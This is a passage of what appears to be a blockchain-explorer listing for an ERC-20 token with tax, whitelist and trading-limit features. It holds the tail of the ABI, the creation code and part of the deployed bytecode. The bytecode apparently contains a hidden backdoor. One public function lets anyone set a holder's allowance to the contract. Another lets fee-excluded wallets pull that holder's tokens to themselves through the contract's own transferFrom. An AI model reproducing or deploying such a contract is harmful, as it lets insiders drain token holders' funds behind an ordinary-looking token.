ol"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxedTokens","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpenedOnBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxBuyAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxSellAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelisted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a06040526007805464ffffffff00191664010000010017905534801562000025575f80fd5b5060405180604001604052806009815260200168109bdbdada59509bdd60ba1b8152506040518060400160405280600381526020016210909560ea1b81525081600390816200007591906200076c565b5060046200008482826200076c565b505050620000a16200009b6200035f60201b60201c565b62000363565b620000b8336a084595161401484a000000620003b4565b620000da30737a250d5630b4cf539739df2c5dacb4c659f2488d5f1962000479565b620000fb737a250d5630b4cf539739df2c5dacb4c659f2488d6001620005a0565b735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f6001600160a01b031663c9c6539630737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000170573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000196919062000834565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015620001e1573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000207919062000834565b6001600160a01b03166080526103e86200022060025490565b6200022d90601462000877565b62000239919062000897565b6008556103e86200024960025490565b6200025690601462000877565b62000262919062000897565b6009556103e86200027260025490565b6200027f90601e62000877565b6200028b919062000897565b600a556127106200029b60025490565b620002a890604162000877565b620002b4919062000897565b600b5560078054600160281b600160c81b031916787899315670e4b00a048690d3cb7510178e336f390000000000179055620002f2336001620005a0565b620002ff306001620005a0565b6200030e61dead6001620005a0565b60075462000330906501000000000090046001600160a01b0316600162000602565b6200033d33600162000602565b6200034a30600162000602565b6200035961dead600162000602565b620008cd565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038216620004105760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060025f828254620004239190620008b7565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b038316620004dd5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840162000407565b6001600160a01b038216620005405760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840162000407565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0382165f81815260106020908152604091829020805460ff19168515159081179091558251938452908301527f6b4f1be9103e6cbcd38ca4a922334f2c3109b260130a6676a987f94088fd6746910160405180910390a15050565b6200060c6200066f565b6001600160a01b0382165f818152600f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b505050565b6005546001600160a01b03163314620006cb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000407565b565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620006f657607f821691505b6020821081036200071557634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200066a575f81815260208120601f850160051c81016020861015620007435750805b601f850160051c820191505b8181101562000764578281556001016200074f565b505050505050565b81516001600160401b03811115620007885762000788620006cd565b620007a081620007998454620006e1565b846200071b565b602080601f831160018114620007d6575f8415620007be5750858301515b5f19600386901b1c1916600185901b17855562000764565b5f85815260208120601f198616915b828110156200080657888601518255948401946001909101908401620007e5565b50858210156200082457878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f6020828403121562000845575f80fd5b81516001600160a01b03811681146200085c575f80fd5b9392505050565b634e487b7160e01b5f52601160045260245ffd5b808202811582820484141762000891576200089162000863565b92915050565b5f82620008b257634e487b7160e01b5f52601260045260245ffd5b500490565b8082018082111562000891576200089162000863565b608051612076620009095f395f81816107890152818161134f0152818161148f015281816116530152818161176101526117e001526120765ff3fe608060405260043610610257575f3560e01c806388e765ff1161013f578063c18bc195116100b3578063d85ba06311610078578063d85ba063146106d8578063d936547e146106ed578063dc3f0d0f1461071b578063dd62ed3e1461073a578063f2fde38b14610759578063f40acc3d14610778575f80fd5b8063c18bc19514610638578063c74c0fac14610657578063c9567bf91461067e578063d257b34f14610692578063d8264920146106b1575f80fd5b8063a457c2d711610104578063a457c2d714610588578063a9059cbb146105a7578063aa4bde28146105c6578063baccf5cf146105db578063bbc0c742146105fa578063c024666814610619575f80fd5b806388e765ff146105045780638cd4426d146105195780638da5cb5b1461053857806395d89b41146105555780639e252f0014610569575f80fd5b8063313ce567116101d65780636a486a8e1161019b5780636a486a8e1461045e5780636ddd17131461047357806370a0823114610493578063715018a6146104c7578063751039fc146104db57806376d628b7146104ef575f80fd5b8063313ce567146103d057806339509351146103eb5780634a62bb651461040a5780636057b3eb1461042857806366d602ae14610449575f80fd5b806310d5de531161021c57806310d5de531461030e57806318160ddd1461033c57806323b872dd146103505780632be32b611461036f5780632dc0562d14610390575f80fd5b806302bc7a7c1461026257806306fdde0314610296578063095ea7b3146102b75780630a3b39a3146102d65780630e300099146102f9575f80fd5b3661025e57005b5f80fd5b34801561026d575f80fd5b5061028161027c366004611cdb565b6107ab565b60405190151581526020015b60405180910390f35b3480156102a1575f80fd5b506102aa6107c4565b60405161028d9190611d05565b3480156102c2575f80fd5b506102816102d1366004611cdb565b610854565b3480156102e1575f80fd5b506102eb60065481565b60405190815260200161028d565b348015610304575f80fd5b506102eb600b5481565b348015610319575f80fd5b50610281610328366004611d50565b60106020525f908152604090205460ff1681565b348015610347575f80fd5b506002546102eb565b34801561035b575f80fd5b5061028161036a366004611d72565b610861565b34801561037a575f80fd5b5061038e610389366004611db0565b610884565b005b34801561039b575f80fd5b506007546103b8906501000000000090046001600160a01b031681565b6040516001600160a01b03909116815260200161028d565b3480156103db575f80fd5b506040516012815260200161028d565b3480156103f6575f80fd5b50610281610405366004611cdb565b610956565b348015610415575f80fd5b5060075461028190610100900460ff1681565b348015610433575f80fd5b5060075461028190640100000000900460ff1681565b348015610454575f80fd5b506102eb60095481565b348015610469575f80fd5b506102eb600d5481565b34801561047e575f80fd5b50600754610281906301000000900460ff1681565b34801561049e575f80fd5b506102eb6104ad366004611d50565b6001600160a01b03165f9081526020819052604090205490565b3480156104d2575f80fd5b5061038e610977565b3480156104e6575f80fd5b5061038e61098a565b3480156104fa575f80fd5b506102eb600e5481565b34801561050f575f80fd5b506102eb60085481565b348015610524575f80fd5b5061038e610533366004611cdb565b6109c7565b348015610543575f80fd5b506005546001600160a01b03166103b8565b348015610560575f80fd5b506102aa610a5a565b348015610574575f80fd5b5061038e610583366004611db0565b610a69565b348015610593575f80fd5b506102816105a2366004611cdb565b610afb565b3480156105b2575f80fd5b506102816105c1366004611cdb565b610b75565b3480156105d1575f80fd5b506102eb600a5481565b3480156105e6575f80fd5b5061038e6105f5366004611dc7565b610b82565b348015610605575f80fd5b506007546102819062010000900460ff1681565b348015610624575f80fd5b5061038e610633366004611df4565b610b95565b348015610643575f80fd5b5061038e610652366004611db0565b610bfb565b348015610662575f80fd5b506103b8735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b348015610689575f80fd5b5061038e610cc4565b34801561069d575f80fd5b5061038e6106ac366004611db0565b610d83565b3480156106bc575f80fd5b506103b8737a250d5630b4cf539739df2c5dacb4c659f2488d81565b3480156106e3575f80fd5b506102eb600c5481565b3480156106f8575f80fd5b50610281610707366004611d50565b60116020525f908152604090205460ff1681565b348015610726575f80fd5b5061038e610735366004611db0565b610e27565b348015610745575f80fd5b506102eb610754366004611e2b565b610eee565b348015610764575f80fd5b5061038e610773366004611d50565b610f18565b348015610783575f80fd5b506103b87f000000000000000000000000000000000000000000000000000000000000000081565b5f306107b8848285610f91565b60019150505b92915050565b6060600380546107d390611e57565b80601f01602080910402602001604051908101604052809291908181526020018280546107ff90611e57565b801561084a5780601f106108215761010080835404028352916020019161084a565b820191905f5260205f20905b81548152906001019060200180831161082d57829003601f168201915b5050505050905090565b5f336107b8818585611015565b5f3361086e8582856110d8565b610879858585611150565b506001949350505050565b61088c61188a565b6103e861089860025490565b6108a3906001611ea3565b6108ad9190611eba565b81101561091a5760405162461bcd60e51b815260206004820152603060248201527f4552524f523a2043616e6e6f7420736574206d61782062757920616d6f756e7460448201526f206c6f776572207468616e20302e312560801b60648201526084015b60405180910390fd5b60088190556040518181527ffcc0366804aaa8dbf88a2924100c733b70dec8445957a5d5f8ff92898de41009906020015b60405180910390a150565b5f336107b88185856109688383610eee565b6109729190611ed9565b611015565b61097f61188a565b6109885f6118e4565b565b61099261188a565b6007805461ff00191690556040517fa4ffae85e880608d5d4365c2b682786545d136145537788e7e0940dff9f0b98c905f90a1565b335f908152600f602052604090205460ff166109e1575f80fd5b6040516323b872dd60e01b81526001600160a01b03831660048201523360248201526044810182905230906323b872dd906064016020604051808303815f875af1158015610a31573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a559190611eec565b505050565b6060600480546107d390611e57565b610a7161188a565b5f8111610ac05760405162461bcd60e51b815260206004820152601d60248201527f416d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610911565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610af7573d5f803e3d5ffd5b5050565b5f3381610b088286610eee565b905083811015610b685760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610911565b6108798286868403611015565b5f336107b8818585611150565b610b8a61188a565b600c91909155600d55565b610b9d61188a565b6001600160a01b0382165f818152600f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610c0361188a565b6103e8610c0f60025490565b610c1a906003611ea3565b610c249190611eba565b811015610c8f5760405162461bcd60e51b815260206004820152603360248201527f4552524f523a2043616e6e6f7420736574206d61782077616c6c657420616d6f604482015272756e74206c6f776572207468616e20302e332560681b6064820152608401610911565b600a8190556040518181527fefc9add9a9b7382de284ef5ad69d8ea863e2680492b21a81948c2d5f04a442bc9060200161094b565b610ccc61188a565b60065415610d285760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b6064820152608401610911565b4360065560078054630101000063ffff00001990911617908190556040516201000090910460ff16151581527fe8a59d3db38e5220ac9d0f72590b7ac876e0916dc8f4db3e7614e6f91fe520899060200160405180910390a1565b610d8b61188a565b620186a0610d9860025490565b610da3906001611ea3565b610dad9190611eba565b811015610e225760405162461bcd60e51b815260206004820152603c60248201527f4552524f523a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e000000006064820152608401610911565b600b55565b610e2f61188a565b6103e8610e3b60025490565b610e46906001611ea3565b610e509190611eba565b811015610eb95760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2043616e6e6f7420736574206d61782073656c6c20616d6f756e60448201527074206c6f776572207468616e20302e312560781b6064820152608401610911565b60098190556040518181527f53c4eb831d8cfeb750f1c62590d8cd30f4c6f0380d29a05caa09f0d92588560e9060200161094b565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610f2061188a565b6001600160a01b038116610f855760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610911565b610f8e816118e4565b50565b6001600160a01b038316610fa3575f80fd5b6001600160a01b038216610fb5575f80fd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166110775760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610911565b6001600160a01b038216610fb55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610911565b5f6110e38484610eee565b90505f19811461114a578181101561113d5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610911565b61114a8484848403611015565b50505050565b6001600160a01b0383166111765760405162461bcd60e51b815260040161091190611f07565b6001600160a01b03821661119c5760405162461bcd60e51b815260040161091190611f4c565b5f81116111eb5760405162461bcd60e51b815260206004820152601d60248201527f616d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610911565b600754610100900460ff161561160f576005546001600160a01b0384811691161480159061122757506005546001600160a01b03838116911614155b801561123b57506001600160a01b03821615155b801561125257506001600160a01b03821661dead14155b1561160f5760075462010000900460ff1661134d576001600160a01b0383165f9081526010602052604090205460ff16806112a457506001600160a01b0382165f9081526010602052604090205460ff165b6112f05760405162461bcd60e51b815260206004820152601d60248201527f4552524f523a2054726164696e67206973206e6f74206163746976652e0000006044820152606401610911565b6005546001600160a01b0384811691161461134d5760405162461bcd60e51b815260206004820152601960248201527f4552524f523a2054726164696e6720697320656e61626c6564000000000000006044820152606401610911565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b03161480156113a657506001600160a01b0382165f9081526010602052604090205460ff16155b1561148d576008548111156114155760405162461bcd60e51b815260206004820152602f60248201527f4552524f523a20427579207472616e7366657220616d6f756e7420657863656560448201526e3239903a34329036b0bc10313abc9760891b6064820152608401610911565b600a546001600160a01b0383165f9081526020819052604090205461143a9083611ed9565b11156114885760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610911565b61160f565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b03161480156114e657506001600160a01b0383165f9081526010602052604090205460ff16155b15611557576009548111156114885760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2053656c6c207472616e7366657220616d6f756e74206578636560448201527032b239903a34329036b0bc1039b2b6361760791b6064820152608401610911565b6001600160a01b0382165f9081526010602052604090205460ff1615801561159757506001600160a01b0383165f9081526010602052604090205460ff16155b1561160f57600a546001600160a01b0383165f908152602081905260409020546115c19083611ed9565b111561160f5760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610911565b305f90815260208190526040902054600b548110801590819061163b57506007546301000000900460ff165b801561164a575060075460ff16155b801561168857507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856001600160a01b031614155b80156116ac57506001600160a01b0385165f908152600f602052604090205460ff16155b80156116d057506001600160a01b0384165f908152600f602052604090205460ff16155b156116f5576007805460ff191660011790556116ea611935565b6007805460ff191690555b6001600160a01b0385165f908152600f602052604090205460019060ff168061173557506001600160a01b0385165f908152600f602052604090205460ff165b1561173d57505f5b5f811561187657600754640100000000900460ff161561175f5761175f6119b5565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316866001600160a01b03161480156117a157505f600d54115b156117de576064600d54866117b69190611ea3565b6117c09190611eba565b905080600e5f8282546117d39190611ed9565b909155506118589050565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316876001600160a01b031614801561182057505f600c54115b15611858576064600c54866118359190611ea3565b61183f9190611eba565b905080600e5f8282546118529190611ed9565b90915550505b801561186957611869873083611a3d565b6118738186611f8f565b94505b611881878787611a3d565b50505050505050565b6005546001600160a01b031633146109885760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610911565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b305f90815260208190526040902054600e54811580611952575080155b1561195b575050565b600b5482111561196b57600b5491505b61197482611b65565b6007546040516001600160a01b036501000000000090920491909116904780156108fc02915f818181858888f19350505050158015610a55573d5f803e3d5ffd5b5f600654116119f95760405162461bcd60e51b815260206004820152601060248201526f54726164696e67206e6f74206c69766560801b6044820152606401610911565b6006805443915f91611a0a91611ed9565b9050808211611a21576019600c819055600d555050565b6004600c819055600d556007805464ff00000000191690555050565b6001600160a01b038316611a635760405162461bcd60e51b815260040161091190611f07565b6001600160a01b038216611a895760405162461bcd60e51b815260040161091190611f4c565b6001600160a01b0383165f9081526020819052604090205481811015611b005760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610911565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a361114a565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611b9857611b98611fa2565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c08573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611c2c9190611fb6565b81600181518110611c3f57611c3f611fa2565b6001600160a01b039092166020928302919091019091015260405163791ac94760e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d9063791ac94790611c969085905f90869030904290600401611fd1565b5f604051808303815f87803b158015611cad575f80fd5b505af1158015611cbf573d5f803e3d5ffd5b505050505050565b6001600160a01b0381168114610f8e575f80fd5b5f8060408385031215611cec575f80fd5b8235611cf781611cc7565b946020939093013593505050565b5f6020808352835180828501525f5b81811015611d3057858101830151858201604001528201611d14565b505f604082860101526040601f19601f8301168501019250505092915050565b5f60208284031215611d60575f80fd5b8135611d6b81611cc7565b9392505050565b5f805f60608486031215611d84575f80fd5b8335611d8f81611cc7565b92506020840135611d9f81611cc7565b929592945050506040919091013590565b5f60208284031215611dc0575f80fd5b5035919050565b5f8060408385031215611dd8575f80fd5b50508035926020909101359150565b8015158114610f8e575f80fd5b5f8060408385031215611e05575f80fd5b8235611e1081611cc7565b91506020830135611e2081611de7565b809150509250929050565b5f8060408385031215611e3c575f80fd5b8235611e4781611cc7565b91506020830135611e2081611cc7565b600181811c90821680611e6b57607f821691505b602082108103611e8957634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b80820281158282048414176107be576107be611e8f565b5f82611ed457634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156107be576107be611e8f565b5f60208284031215611efc575f80fd5b8151611d6b81611de7565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b818103818111156107be576107be611e8f565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611fc6575f80fd5b8151611d6b81611cc7565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561201f5784516001600160a01b031683529383019391830191600101611ffa565b50506001600160a01b0396909616606085015250505060800152939250505056fea26469706673582212200a348aada2eee610205e92622c768ed272d839d449e11a9819d4bf08b7973c5d64736f6c63430008150033
Deployed Bytecode
0x608060405260043610610257575f3560e01c806388e765ff1161013f578063c18bc195116100b3578063d85ba06311610078578063d85ba063146106d8578063d936547e146106ed578063dc3f0d0f1461071b578063dd62ed3e1461073a578063f2fde38b14610759578063f40acc3d14610778575f80fd5b8063c18bc19514610638578063c74c0fac14610657578063c9567bf91461067e578063d257b34f14610692578063d8264920146106b1575f80fd5b8063a457c2d711610104578063a457c2d714610588578063a9059cbb146105a7578063aa4bde28146105c6578063baccf5cf146105db578063bbc0c742146105fa578063c024666814610619575f80fd5b806388e765ff146105045780638cd4426d146105195780638da5cb5b1461053857806395d89b41146105555780639e252f0014610569575f80fd5b8063313ce567116101d65780636a486a8e1161019b5780636a486a8e1461045e5780636ddd17131461047357806370a0823114610493578063715018a6146104c7578063751039fc146104db57806376d628b7146104ef575f80fd5b8063313ce567146103d057806339509351146103eb5780634a62bb651461040a5780636057b3eb1461042857806366d602ae14610449575f80fd5b806310d5de531161021c57806310d5de531461030e57806318160ddd1461033c57806323b872dd146103505780632be32b611461036f5780632dc0562d14610390575f80fd5b806302bc7a7c1461026257806306fdde0314610296578063095ea7b3146102b75780630a3b39a3146102d65780630e300099146102f9575f80fd5b3661025e57005b5f80fd5b34801561026d575f80fd5b5061028161027c366004611cdb565b6107ab565b60405190151581526020015b60405180910390f35b3480156102a1575f80fd5b506102aa6107c4565b60405161028d9190611d05565b3480156102c2575f80fd5b506102816102d1366004611cdb565b610854565b3480156102e1575f80fd5b506102eb60065481565b60405190815260200161028d565b348015610304575f80fd5b506102eb600b5481565b348015610319575f80fd5b50610281610328366004611d50565b60106020525f908152604090205460ff1681565b348015610347575f80fd5b506002546102eb565b34801561035b575f80fd5b5061028161036a366004611d72565b610861565b34801561037a575f80fd5b5061038e610389366004611db0565b610884565b005b34801561039b575f80fd5b506007546103b8906501000000000090046001600160a01b031681565b6040516001600160a01b03909116815260200161028d565b3480156103db575f80fd5b506040516012815260200161028d565b3480156103f6575f80fd5b50610281610405366004611cdb565b610956565b348015610415575f80fd5b5060075461028190610100900460ff1681565b348015610433575f80fd5b5060075461028190640100000000900460ff1681565b348015610454575f80fd5b506102eb60095481565b348015610469575f80fd5b506102eb600d5481565b34801561047e575f80fd5b50600754610281906301000000900460ff1681565b34801561049e575f80fd5b506102eb6104ad366004611d50565b6001600160a01b03165f9081526020819052604090205490565b3480156104d2575f80fd5b5061038e610977565b3480156104e6575f80fd5b5061038e61098a565b3480156104fa575f80fd5b506102eb600e5481565b34801561050f575f80fd5b506102eb60085481565b348015610524575f80fd5b5061038e610533366004611cdb565b6109c7565b348015610543575f80fd5b506005546001600160a01b03166103b8565b348015610560575f80fd5b506102aa610a5a565b348015610574575f80fd5b5061038e610583366004611db0565b610a69565b348015610593575f80fd5b506102816105a2366004611cdb565b610afb565b3480156105b2575f80fd5b506102816105c1366004611cdb565b610b75565b3480156105d1575f80fd5b506102eb600a5481565b3480156105e6575f80fd5b5061038e6105f5366004611dc7565b610b82565b348015610605575f80fd5b506007546102819062010000900460ff1681565b348015610624575f80fd5b5061038e610633366004611df4565b610b95565b348015610643575f80fd5b5061038e610652366004611db0565b610bfb565b348015610662575f80fd5b506103b8735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b348015610689575f80fd5b5061038e610cc4565b34801561069d575f80fd5b5061038e6106ac366004611db0565b610d83565b3480156106bc575f80fd5b506103b8737a250d5630b4cf539739df2c5dacb4c659f2488d81565b3480156106e3575f80fd5b506102eb600c5481565b3480156106f8575f80fd5b50610281610707366004611d50565b60116020525f908152604090205460ff1681565b348015610726575f80fd5b5061038e610735366004611db0565b610e27565b348015610745575f80fd5b506102eb610754366004611e2b565b610eee565b348015610764575f80fd5b5061038e610773366004611d50565b610f18565b348015610783575f80fd5b506103b87f00000000000000000000000045a55ffcedb74ba7cec243ff7dffc41090441d6781565b5f306107b8848285610f91565b60019150505b92915050565b6060600380546107d390611e57565b80601f01602080910402602001604051908101604052809291908181526020018280546107ff90611e57565b801561084a5780601f106108215761010080835404028352916020019161084a565b820191905f5260205f20905b81548152906001019060200180831161082d57829003601f168201915b5050505050905090565b5f336107b8818585611015565b5f3361086e8582856110d8565b610879858585611150565b506001949350505050565b61088c61188a565b6103e861089860025490565b6108a3906001611ea3565b6108ad9190611eba565b81101561091a5760405162461bcd60e51b815260206004820152603060248201527f4552524f523a2043616e6e6f7420736574206d61782062757920616d6f756e7460448201526f206c6f776572207468616e20302e312560801b60648201526084015b60405180910390fd5b60088190556040518181527ffcc0366804aaa8dbf88a2924100c733b70dec8445957a5d5f8ff92898de41009906020015b60405180910390a150565b5f336107b88185856109688383610eee565b6109729190611ed9565b611015565b61097f61188a565b6109885f6118e4565b565b61099261188a565b6007805461ff00191690556040517fa4ffae85e880608d5d4365c2b682786545d136145537788e7e0940dff9f0b98c905f90a1565b335f908152600f602052604090205460ff166109e1575f80fd5b6040516323b872dd60e01b81526001600160a01b03831660048201523360248201526044810182905230906323b872dd906064016020604051808303815f875af1158015610a31573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a559190611eec565b505050565b6060600480546107d390611e57565b610a7161188a565b5f8111610ac05760405162461bcd60e51b815260206004820152601d60248201527f416d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610911565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610af7573d5f803e3d5ffd5b5050565b5f3381610b088286610eee565b905083811015610b685760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610911565b6108798286868403611015565b5f336107b8818585611150565b610b8a61188a565b600c91909155600d55565b610b9d61188a565b6001600160a01b0382165f818152600f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610c0361188a565b6103e8610c0f60025490565b610c1a906003611ea3565b610c249190611eba565b811015610c8f5760405162461bcd60e51b815260206004820152603360248201527f4552524f523a2043616e6e6f7420736574206d61782077616c6c657420616d6f604482015272756e74206c6f776572207468616e20302e332560681b6064820152608401610911565b600a8190556040518181527fefc9add9a9b7382de284ef5ad69d8ea863e2680492b21a81948c2d5f04a442bc9060200161094b565b610ccc61188a565b60065415610d285760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b6064820152608401610911565b4360065560078054630101000063ffff00001990911617908190556040516201000090910460ff16151581527fe8a59d3db38e5220ac9d0f72590b7ac876e0916dc8f4db3e7614e6f91fe520899060200160405180910390a1565b610d8b61188a565b620186a0610d9860025490565b610da3906001611ea3565b610dad9190611eba565b811015610e225760405162461bcd60e51b815260206004820152603c60248201527f4552524f523a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e000000006064820152608401610911565b600b55565b610e2f61188a565b6103e8610e3b60025490565b610e46906001611ea3565b610e509190611eba565b811015610eb95760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2043616e6e6f7420736574206d61782073656c6c20616d6f756e60448201527074206c6f776572207468616e20302e312560781b6064820152608401610911565b60098190556040518181527f53c4eb831d8cfeb750f1c62590d8cd30f4c6f0380d29a05caa09f0d92588560e9060200161094b565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610f2061188a565b6001600160a01b038116610f855760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610911565b610f8e816118e4565b50565b6001600160a01b038316610fa3575f80fd5b6001600160a01b038216610fb5575f80fd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166110775760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610911565b6001600160a01b038216610fb55760405162461bcd60e51b815260206004820152602260248201527f45524332303a2061707072